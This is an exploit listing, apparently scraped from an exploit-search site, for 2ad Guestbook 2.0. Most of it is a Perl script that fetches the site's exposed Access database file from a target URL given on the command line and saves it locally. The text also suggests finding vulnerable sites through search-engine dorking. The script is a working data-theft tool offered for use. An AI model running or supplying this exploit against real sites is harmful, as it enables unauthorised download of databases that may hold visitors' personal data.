Exploit for 2ad Guestbook 2.0 Database Disclosure

Name: Exploit for 2ad Guestbook 2.0 Database Disclosure
Rating: 5 (501 reviews)
2023-01-12 | CVSS -0.6
## https://sploitus.com/exploit?id=PACKETSTORM:170477
====================================================================================================================================  
| # Title : 2ad guestbook version 2.0 Database Disclosure Exploit |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0(32-bit) |   
| # Vendor : http://www.2ad.free.fr |   
| # Dork : |  
====================================================================================================================================  
  
poc :  
  
[-] Download the database:   
  
The following Perl exploit will attempt to download the (livre-or.mdbsmdb.mdb ) file  
The (livre-or.mdbsmdb.mdb) It is the database and contains all the data .  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] save code as perl file : poc.pl  
  
[+] code :  
  
#!/usr/bin/perl -w  
#  
# 2ad guestbook version 2.0 Database Disclosure Exploit   
#  
# Author : indoushka  
#  
# Vondor : http://www.2ad.free.fr  
  
  
  
use LWP::Simple;  
use LWP::UserAgent;  
  
system('cls');  
print "\n[+] 2ad guestbook version 2.0 Database Disclosure Exploit [+] \n\n";  
system('color a');  
  
  
if(@ARGV < 2)  
{  
print "[-]How To Use\n\n";  
&help; exit();  
}  
sub help()  
{  
print "[+] usage1 : perl $0 site.com /path/ \n";  
print "[+] usage2 : perl $0 localhost / \n";  
}  
($TargetIP, $path, $File,) = @ARGV;  
  
$File="db/livre-or.mdbsmdb.mdb";  
my $url = "http://" . $TargetIP . $path . $File;  
print "\n Fuck you wait!!! \n\n";  
  
my $useragent = LWP::UserAgent->new();  
my $request = $useragent->get($url,":content_file" => "D:/livre-or.mdb");  
  
if ($request->is_success)  
{  
print "[+] $url Exploited!\n\n";  
print "[+] Database saved to D:/livre-or.mdb\n";  
exit();  
}  
else  
{  
print "[!] Exploiting $url Failed !\n[!] ".$request->status_line."\n";  
exit();  
}  
  
  
Greetings to :=========================================================================================================================  
|  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |   
|  
=======================================================================================================================================